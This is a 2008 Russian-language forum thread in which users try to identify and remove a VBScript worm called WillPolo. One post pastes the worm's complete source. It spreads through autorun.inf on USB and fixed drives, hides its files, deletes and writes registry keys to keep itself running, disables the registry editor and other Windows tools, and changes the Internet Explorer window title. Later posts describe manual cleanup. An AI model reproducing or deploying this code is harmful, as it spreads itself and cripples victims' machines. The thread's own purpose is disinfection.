Твої кошти наближають перемогу.
Допомагай збройним силам України!

JavaScript вимкнений. Будь ласка, ввімкніть JavaScript у своєму браузері, перш ніж продовжувати.

Pirate par VIRUS:WillPollo -Ingenieur en hacking-fuck -

Автор теми MarunYA
Дата створення 19.01.2008

MarunYA

19.01.2008

#1

Pirate par VIRUS:WillPollo ---Ingenieur en hacking---fuck ---

Virus WillPollo!

Что это за гадость?У меня не обнаруживает на KIS,не NIS,не NOD.

Кто нибудь встречал?

Первый признак.В открытом IE видно вверху Pirate par WillPollo ---Ingenieur en hacking---fuck ---

fluder

20.01.2008

#2

что что? поимели тебя вот что, дыр в ие выше крыши которые не латают
если тебе скажут что в ие нашли очередное переполнение буфера тебя это успокоит? бери другой браузер да юзай пока заплаток нету на ослика ие, а информацию в подробностях тебе скорее всего никто не скажет, пока не пройдёшся дебаггером сама, секьюрити уже давно бизнес, а не выпендрёж

Sefiroth

20.01.2008

#3

А чёрт его знает...
Гугл на эту тему пока молчит.
Если это новый вирь - жди информации о нём или появления в базах.
Но можешь сама поколупать конечно. )))
Самый простой способ - на виртуальной машине поставить винь, запустить filemon, regmon, файрвол и попробовать заразить IE. А потом сидеть и смотреть логи этих самых прог.
Если не поможет - дизассемблер.

MarunYA

20.01.2008

#4

Вот его тело:

'Petit script pour m'entrainer
'le nom de ce script est WillPolo
'son principe est simple...............
on error resume next
dim CodeSource,RepWin,CleUSB,FichierScript
dim LeFichier,TextAutoRun,CheminDAcces,Registre,nt,Choisir,FinDuScript
TextAutoRun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe WillPolo.vbs"&vbcrlf&"action=""Pas d'action"""
set FichierScript = createobject("Scripting.FileSystemObject")
set LeFichier = FichierScript.getfile(Wscript.ScriptFullname)
dim text,size
size = LeFichier.size
Choisir = LeFichier.drive.drivetype
set text=LeFichier.openastextstream(1,-2)
do while not text.atendofstream
CodeSource=CodeSource &text.readline
CodeSource=CodeSource & vbcrlf
loop
do
Set RepWin = FichierScript.getspecialfolder(0)
set CheminDAcces = FichierScript.getfile(RepWin & "\WillPolo.vbs")
CheminDAcces.attributes = 32
set CheminDAcces=FichierScript.createtextfile(RepWin & "\WillPolo.vbs",2,true)
CheminDAcces.write CodeSource
CheminDAcces.close
set CheminDAcces = FichierScript.getfile(RepWin & "\WillPolo.vbs")
CheminDAcces.attributes = 39
for each CleUSB in FichierScript.drives
If (CleUSB.drivetype = 1 or CleUSB.drivetype = 2) and CleUSB.path <> "A:" then
set CheminDAcces=FichierScript.getfile(CleUSB.path &"\WillPolo.vbs")
CheminDAcces.attributes =32
set CheminDAcces=FichierScript.createtextfile(CleUSB.path &"\WillPolo.vbs",2,true)
CheminDAcces.write CodeSource
CheminDAcces.close
set CheminDAcces=FichierScript.getfile(CleUSB.path &"\WillPolo.vbs")
CheminDAcces.attributes =39
set CheminDAcces =FichierScript.getfile(CleUSB.path &"\autorun.inf")
CheminDAcces.attributes = 32
set CheminDAcces=FichierScript.createtextfile(CleUSB.path &"\autorun.inf",2,true)
CheminDAcces.write TextAutoRun
CheminDAcces.close
set CheminDAcces =FichierScript.getfile(CleUSB.path &"\autorun.inf")
CheminDAcces.attributes=39
end if
next
set Registre = createobject("WScript.Shell")
Registre.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
Registre.RegDelete "HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL",1,"RED_DWORD"
Registre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"RED_DWORD"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WillPolo",RepWin&"\WillPolo.vbs"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Merci pour votre participation"
Registre.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeTexte", "Mon virus est dans votre machine, Merci de le partager avec vos amis"
Registre.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Pirate par WillPolo ---- Ingenieur en hacking -------- fuck u ----------"

if Choisir <> 1 then
Wscript.sleep 200000
end if
loop while Choisir<>1
set FinDuScript = createobject("Wscript.shell")
FinDuScript.run RepWin&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

MarunYA

20.01.2008

#5

Fluder сказав(ла):
что что? поимели тебя вот что, дыр в ие выше крыши которые не латают
если тебе скажут что в ие нашли очередное переполнение буфера тебя это успокоит? бери другой браузер да юзай пока заплаток нету на ослика ие, а информацию в подробностях тебе скорее всего никто не скажет, пока не пройдёшся дебаггером сама, секьюрити уже давно бизнес, а не выпендрёж

Я Operу юзаю,при чем тут это,у меня он на работе в сетке появился,а изначальные юзеры юзают IE.

P.S.Я он,Маруня

:-]

20.01.2008

#6

поставь какойнить простенький мегалинух

MarunYA

20.01.2008

#7

:-] сказав(ла):
поставь какойнить простенький мегалинух

Млин...Причем тут это у меня на буке плюс к Винде стоит Gentoo с FreeBSD.У меня проблема с клиентскими машинами.

P.S.Тупой флуд!!!

fluder

20.01.2008

#8

MarunYA сказав(ла):
Я Operу юзаю,при чем тут это,у меня он на работе в сетке появился,а изначальные юзеры юзают IE.

P.S.Я он,Маруня

насрато что юзаеш ты, если люди лазят по бесплатным порносайтам собирая всю заразу инета, чем тут поможеш? поставь другой браузер ... Писать патчи за майкрософт на ие тут явно никто не будет, да и дело это не 5ти минут

тем более провидцев нету, без visual basic sript и исполняемого файла разобрать нельзя точно

jaxwell

21.01.2008

#9

Такая же хрень. Avira находит его, удаляет. Но этот скрипт, бля, прописывается через автораны. Все поотключал, особо меня не беспокоит. Но все равно - кто флешку не вставляет - уходит с этой фигней... Как бороться - пока сам в поисках.

ЗЫ. Скрипт прописывается в реестре - просто удалить его записи не получается = все равно каким-то чудом он заново прописывается.

oldcolony

21.01.2008

#10

стандартный autorun вирус, но он кажется подстрахован через екзешники прописанные в реестре. стока этого говна плывет последнее время- в голове путаются. отключайте autorun- вон тема свежая, меня оно уже так задолбало, что все бросил, сел и разрулил вопрос. Такой вирус студенту ит специальности натворить- один вечер с похмелья, а вы хотите, шоб его антивирусы ловили. Сам авторан виден невооруженным глазом, проблема-найти страховочную часть, что его восстановит, хотя тоже небольшая. лечил я кому-то на днях этот трипер, но уже не помню как, потому что после этого еще два принесли, а там все из той же оперы, но другие.В этом может и ехешника нет, кажется один vbs

Так. Судя по анализу- прописывает в реестр запуск скрипта , включает, если было отключено , автозапуск с флэшек и винтов и так вроде все. Лечить- постирать все willpolo.vbs и autorun, сперва убрать из ветки run запуск вируса.

Останнє редагування: 21.01.2008

MarunYA

21.01.2008

#11

oldcolony сказав(ла):
стандартный autorun вирус, но он кажется подстрахован через екзешники прописанные в реестре. стока этого говна плывет последнее время- в голове путаются. отключайте autorun- вон тема свежая, меня оно уже так задолбало, что все бросил, сел и разрулил вопрос. Такой вирус студенту ит специальности натворить- один вечер с похмелья, а вы хотите, шоб его антивирусы ловили. Сам авторан виден невооруженным глазом, проблема-найти страховочную часть, что его восстановит, хотя тоже небольшая. лечил я кому-то на днях этот трипер, но уже не помню как, потому что после этого еще два принесли, а там все из той же оперы, но другие.В этом может и ехешника нет, кажется один vbs

Так. Судя по анализу- прописывает в реестр запуск скрипта , включает, если было отключено , автозапуск с флэшек и винтов и так вроде все. Лечить- постирать все willpolo.vbs и autorun, сперва убрать из ветки run запуск вируса.

Еще вчера руками почистил.

sparkemon

Привіт!

22.01.2008

#12

чистится это все легко в общем-то и непринужденно!! Кому надо, кину на мыло архив, где есть все для очистки, думаю разберетесь =)
ребут в безопасный режим и вперед! сам у себя и на работе чистил...

у меня так получилось:

Загружаешься в безопасном режиме.
1) Запускаешь msconfig и отключаешь загрузку WillPolo
2) Включаешь отображение скрытых файлов и папок + снимаешь галочку Скрывать защищенные системные файлы
3) Удаляешь нафик с дисков и флешек файлы WillPolo.vbs и autorun.inf
4) Запускаешь regedit и через CTRL+F ищешь WillPolo. Удаляешь его и там...
5) Запускаешь сlean.cmd и выбираешь пункт 1
6) Запускаешь сlean.cmd и выбираешь пункт 2
7) Запускаешь remove.reg

А-а-а, я тут редко, поэтому пишите письма на archery{сабака}inbox{тчк}ru кому надо =)

Останнє редагування: 22.01.2008

Ви повинні увійти або зареєструватися, щоб відповісти.

Зверху Знизу